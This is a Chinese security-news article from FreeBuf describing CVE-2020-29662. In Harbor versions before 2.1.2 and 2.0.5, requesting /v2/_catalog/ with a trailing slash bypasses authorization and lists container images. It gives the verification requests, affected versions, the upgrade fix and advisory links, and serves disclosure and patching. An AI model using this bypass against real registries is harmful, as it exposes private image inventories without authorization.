freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Harbor镜像列表未授权访问:CVE-2020-29662
2022-05-06 11:54:52

概述

这里分享的是Harbor的一个中低危漏洞,镜像列表未授权访问

本身访问是需要授权的,但是直接访问/v2/_catalog和/v2/可以绕过


影响版本

Harbor < v2.1.2 或 Harbor< v2.0.5 版本

漏洞验证

访问

GET /v2/_catalog

目录,返回数据为空

http://localhost:80/v2/

1651808776_62749a08abd7b62ae7819.png!small

访问

GET /v2/_catalog/

目录,得到镜像列表

http://localhost:80/v2/_catalog/

1651808965_62749ac50788aebf403c8.png!small?1651808928677



修复方案

升级至最新版


参考:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29662

https://github.com/goharbor/harbor/security/advisories/GHSA-38r5-34mr-mvm7

https://github.com/goharbor/harbor/releases/tag/v2.1.2
https://github.com/goharbor/harbor/releases/tag/v2.0.5



本文作者:, 转载请注明来自FreeBuf.COM

# web安全 # CVE
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑